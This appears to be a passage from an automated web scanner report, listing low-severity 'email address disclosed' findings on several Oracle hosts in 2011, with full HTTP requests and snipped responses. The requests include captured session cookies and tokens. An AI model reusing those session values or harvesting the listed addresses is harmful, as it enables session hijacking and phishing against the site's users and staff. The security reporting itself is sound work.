Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:35:28 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:07 GMT
Accept-Ranges: bytes
Content-Length: 456625
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html><head><script>var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;</script></head><body><script><!--
var _,pbc='com.google.gwt.core.client.',qbc='com.google.gwt.http.client.'
...[SNIP]...
<br/>&nbsp;&nbsp;&nbsp;&nbsp;campusrelations_jp@oracle.com<br/>
...[SNIP]...
<br />\u304A\u554F\u5408\u305B\u30E1\u30FC\u30EB\u30A2\u30C9\u30EC\u30B9\uFF08\u65B0\u5352\u63A1\u7528\uFF1Acampusrelations_jp@oracle.com\uFF09<br />
...[SNIP]...

13.11. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/adapter/ext/ext-base.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/gwt/otn.todo.TodoApp/js/ext/adapter/ext/ext-base.js

Issue detail

The following email address was disclosed in the response:

Request

GET /campus/gwt/otn.todo.TodoApp/js/ext/adapter/ext/ext-base.js HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/TodoApp.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:35:26 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:07 GMT
Accept-Ranges: bytes
Content-Length: 35541
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/*
* Ext JS Library 2.0.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

Ext={version:"2.0.2"};window["undefined"]=window["undefined"];Ext.apply=function(C,D,B){if(B){Ext.apply(C,B)}if(C&&D&&typeof D=="object"){for(var A in D){C[A]
...[SNIP]...

13.12. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/ext-all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/gwt/otn.todo.TodoApp/js/ext/ext-all.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /campus/gwt/otn.todo.TodoApp/js/ext/ext-all.js HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/TodoApp.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:35:26 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:07 GMT
Accept-Ranges: bytes
Content-Length: 514446
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

/*
* Ext JS Library 2.0.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

Ext.DomHelper=function(){var L=null;var F=/^(?:br|frame|hr|img|input|link|meta|range|spacer|wbr|area|param|col)$/i;var B=/^table|tbody|tr|td$/i;var A=function
...[SNIP]...
-\w]+\.)+\w{2,3}(\/[%\-\w]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?)/i;return{"email":function(E){return B.test(E)},"emailText":"This field should be an e-mail address in the format \"user@domain.com\"","emailMask":/[a-z0-9_\.\-@]/i,"url":function(E){return A.test(E)},"urlText":"This field should be a URL in the format \"http:/"+"/www.domain.com\"","alpha":function(E){return C.test(E)},"alphaText"
...[SNIP]...

13.13. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/resources/css/ext-all.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/gwt/otn.todo.TodoApp/js/ext/resources/css/ext-all.css

Issue detail

The following email address was disclosed in the response:

Request

GET /campus/gwt/otn.todo.TodoApp/js/ext/resources/css/ext-all.css HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/TodoApp.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:35:26 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:07 GMT
Accept-Ranges: bytes
Content-Length: 77845
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/*
* Ext JS Library 2.0.2
* Copyright(c) 2006-2008, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

html,body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,p,blockquote,th,td{margin:0;padding:0;}
img,body,html{border:0;}
address,caption,cite,cod
...[SNIP]...

13.14. http://crmondemand.oracle.com/error/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crmondemand.oracle.com
Path:   /error/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /error/s_code.js HTTP/1.1
Host: crmondemand.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 01:13:08 GMT
Last-Modified: Fri, 16 Jul 2010 14:46:57 GMT
ETag: "ba8012-75b9-48b824a653a40"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (G;max-age=300+0;age=0;ecid=49402403647881011,0:1)
Content-Length: 30137

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

13.15. https://irecruitment.oracle.com/OA_HTML/OA.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/OA.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /OA_HTML/OA.jsp?page=/oracle/apps/irc/candidateSelfService/webui/VisHomePG&_ri=821&OAPB=IRC_BRAND&_ti=209088196&oapc=2&OAMC=1053761_30_0&menu=Y&oaMenuLevel=1&oas=U0LRYcVUwxg759o0SbpSdQ.. HTTP/1.1
Host: irecruitment.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 46670
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Connection: Close
Date: Mon, 17 Oct 2011 12:25:25 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html dir="ltr" lang="en-US-ORACLE9I"><head><title>iRecruitment Visitor Home Page</title><meta name="generator
...[SNIP]...
<a id="MIS_IRC_EXT_REG_USEFULLINK_CONTACT" name="MIS_IRC_EXT_REG_USEFULLINK_CONTACT" title="Contact Us *" href="mailto:irecruitsupport_us@oracle.com?subject=iRecruitment%20User">
...[SNIP]...

13.16. https://irecruitment.oracle.com/OA_HTML/RF.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/RF.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA.. HTTP/1.1
Host: irecruitment.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; gpw_e24=no%20value; s_cc=true; s_sq=%5B%5BB%5D%5D; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 46433
Set-Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Connection: Keep-Alive
Keep-Alive: timeout=60, max=999
Date: Mon, 17 Oct 2011 12:22:56 GMT
Content-Location: https://irecruitment.oracle.com/OA_HTML/OA.jsp


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html dir="ltr" lang="en-US-ORACLE9I"><head><title>iRecruitment Visitor Home Page</title><meta name="generator
...[SNIP]...
<a id="MIS_IRC_EXT_REG_USEFULLINK_CONTACT" name="MIS_IRC_EXT_REG_USEFULLINK_CONTACT" title="Contact Us *" href="mailto:irecruitsupport_us@oracle.com?subject=iRecruitment%20User">
...[SNIP]...

13.17. https://irecruitment.oracle.com/OA_HTML/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /OA_HTML/s_code.js HTTP/1.1
Host: irecruitment.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4b6c18f94d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; gpw_e24=no%20value; s_cc=true; s_sq=%5B%5BB%5D%5D; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C

Response

HTTP/1.1 200 OK
Expires: Mon, 17 Oct 2011 04:20:35 GMT
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Feb 2010 18:36:28 GMT
Connection: Keep-Alive
Keep-Alive: timeout=60, max=999
Content-Length: 28565
Date: Sun, 16 Oct 2011 04:20:35 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

13.18. https://shop.oracle.com/pls/ostore/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.oracle.com
Path:   /pls/ostore/f

Issue detail

The following email addresses were disclosed in the response:

Request

GET /pls/ostore/f?p=dstore:home:7881107130450135&tz=-5:00 HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://shop.oracle.com/pls/ostore/f?p=dstore:home:0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fus%2Fproducts%2Fapplications%2Fpeoplesoft-enterprise%2Fhcm%2Findex.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Fpeoplesoft-enterprise%25252Fhcm%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Astore%25253Astorespareparts%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:47:05 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 18439
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<a href="mailto:oraclesales_us@oracle.com?subject=Oracle Store Inquiry">
...[SNIP]...
<a href="mailto:oraclehelp_ww@oracle.com?subject=Oracle Store Inquiry">
...[SNIP]...

13.19. http://solutions.oracle.com/img/opn_navtree.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /img/opn_navtree.js

Issue detail

The following email address was disclosed in the response:

Request

GET /img/opn_navtree.js HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://solutions.oracle.com/home/basic_search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000

Response

HTTP/1.1 200 OK
ETag: "926a2-559c-451c26aa"
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Sep 2006 19:46:50 GMT
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=86400+0;age=5867;ecid=169389384283,0)
Content-Length: 21916
Date: Sun, 16 Oct 2011 10:24:01 GMT
Accept-Ranges: bytes

// Title: COOLjsTreePRO
// URL: http://javascript.cooldev.com/scripts/cooltreepro/
// Version: 2.3.1
// Last Modify: 02 Apr 2003
// Author: Sergey Nosenko <darknos@cooldev.com>
// Notes: Registra
...[SNIP]...

13.20. http://solutions.oracle.com/img/s_code19b.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /img/s_code19b.js

Issue detail

The following email address was disclosed in the response:

Request

GET /img/s_code19b.js HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://solutions.oracle.com/home/basic_search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; gpv_p24=no%20value; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000

Response

HTTP/1.1 200 OK
ETag: "2dae0c-7347-4a12b594"
Content-Type: application/x-javascript
Last-Modified: Tue, 19 May 2009 13:35:16 GMT
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=86400+0;age=86394;ecid=83395554453,1)
Content-Length: 29511
Date: Mon, 10 Oct 2011 11:47:00 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
